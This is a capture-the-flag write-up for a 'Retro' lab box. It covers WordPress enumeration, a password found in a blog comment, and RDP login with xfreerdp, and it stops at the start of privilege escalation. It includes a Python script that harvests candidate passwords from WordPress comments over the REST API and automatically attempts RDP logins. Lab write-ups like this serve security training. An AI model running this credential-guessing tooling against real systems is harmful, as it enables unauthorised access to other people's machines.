Retro

User's password left in a blog comment - RDP access - Privilege escalation by manipulating UAC's certificate dialog

Scanning

Starting off with an nmap scan of the target

Enumeration

Let's start with a dirsearch scan against the web server

The dirsearch results suggest the target is running WordPress under /retro, so let's first crawl the /retro directory manually.

The site holds a number of blog posts about old-school retro games, and there is nothing of interest in the page source.

  • We also confirm that the target runs WordPress: its theme and plugin assets are served from /retro/wp-content

Clicking on the user Wade redirects us to the author page, which lists all of Wade's blog posts

  • We checked them, but they contained no hints or secrets

  • So we shifted our attention from the posts to the comments

  • Wade has commented on the blog post about Ready Player One

Initial Foothold

In the Ready Player One post, Wade has left a comment with a word to remember: parzival

  • This is an interesting word: Parzival is the name of Wade's avatar in Ready Player One, so it may well be the password for a user account named wade

Since RDP is exposed on the target, why not try logging in with these credentials? The guess was right and we got a session:

xfreerdp /u:wade /p:parzival /v:10.10.167.18
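As an added example (not code from the original writeup), the script below automates the enumeration and foothold steps above: it lists WordPress authors and comments, extracts distinctive words from each author's own comments as password candidates, and emits the xfreerdp command line for each guess. Instead of browsing the author page and comment threads by hand, it uses the stock WP REST API, so it assumes the target exposes /wp-json/wp/v2/ (enabled by default since WordPress 4.7), that an author's login matches the REST "slug", and that RDP is the service to try. The embedded user and comment data is constructed for this example and is not the room's actual content.

```python
"""WordPress author/comment enumeration feeding RDP credential guesses.

Added example, not code from the original writeup. Assumptions: the target
exposes the stock WP REST API under <base>/wp-json/wp/v2/, a user's login
equals the REST "slug", and RDP is the service to try. URLs, hosts and the
sample data below are placeholders / constructed, not the room's content.
"""
import json
import re
import subprocess
import sys
import urllib.request
from html import unescape

# Common English words of 6+ letters that appear in comments but are poor
# password guesses; extend as needed. Everything else long enough is kept
# for a human to triage.
COMMON_WORDS = {"leaving", "myself", "remember", "please", "thanks", "really",
                "awesome", "anyone", "should", "because", "people", "better"}

# Constructed sample of what the two REST endpoints return (trimmed to the
# fields used here). The comment text is made up for this example.
SAMPLE_USERS = [{"id": 1, "name": "Wade", "slug": "wade"}]
SAMPLE_COMMENTS = [{
    "id": 2, "post": 12, "author": 1, "author_name": "Wade",
    "content": {"rendered": "<p>Leaving myself a note here so I remember the word: parzival</p>"},
}]


def fetch_json(url, timeout=10):
    """GET a JSON document (used only for a live run against a target)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.load(resp)


def strip_html(fragment):
    """Drop tags and decode entities from a rendered comment body."""
    return unescape(re.sub(r"<[^>]+>", " ", fragment))


def candidate_words(text, min_len=6):
    """Tokens long enough to be a password and not in the common-word list."""
    pattern = r"[A-Za-z0-9!@#$%^&*_-]{" + str(min_len) + ",}"
    seen, out = set(), []
    for tok in re.findall(pattern, text):
        if tok.lower() in COMMON_WORDS or tok in seen:
            continue
        seen.add(tok)
        out.append(tok)
    return out


def build_credentials(users, comments, min_len=6):
    """Pair each commenter's login with the notable words in their own comments.

    Registered commenters are resolved through the users list (REST 'author'
    is the user id); anonymous comments (author 0) fall back to author_name.
    """
    logins = {u["id"]: u["slug"] for u in users}
    creds = []
    for c in comments:
        login = logins.get(c.get("author")) or c.get("author_name", "").lower()
        if not login:
            continue
        text = strip_html(c.get("content", {}).get("rendered", ""))
        for word in candidate_words(text, min_len):
            if (login, word) not in creds:
                creds.append((login, word))
    return creds


def xfreerdp_command(login, password, host):
    """Command line for one RDP login attempt (FreeRDP 2.x option syntax)."""
    return ["xfreerdp", f"/u:{login}", f"/p:{password}", f"/v:{host}",
            "/cert:ignore"]  # skip the interactive certificate prompt


def enumerate_site(base_url):
    """Live run: pull users and comments through the REST API."""
    api = base_url.rstrip("/") + "/wp-json/wp/v2/"
    users = fetch_json(api + "users?per_page=100")
    comments = fetch_json(api + "comments?per_page=100")
    return build_credentials(users, comments)


if __name__ == "__main__":
    # usage: python wp_comment_creds.py [http://TARGET/retro] [RDP_HOST]
    creds = (enumerate_site(sys.argv[1]) if len(sys.argv) > 1
             else build_credentials(SAMPLE_USERS, SAMPLE_COMMENTS))
    rdp_host = sys.argv[2] if len(sys.argv) > 2 else "TARGET"
    for login, password in creds:
        cmd = xfreerdp_command(login, password, rdp_host)
        print(" ".join(cmd))
        if len(sys.argv) > 2:
            subprocess.run(cmd)  # try each guess; stop once one opens a session
```

Run without arguments it works on the embedded sample and prints the single guess wade / parzival; with a base URL and RDP host it enumerates the live site and tries each pair. The word filter is deliberately loose: a short common-word list drops obvious English, and a human still reviews what remains before spraying, since every failed RDP login is logged on the target.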

Privilege Escalation

Once logged in, we notice that there are some files in the Recycle Bin
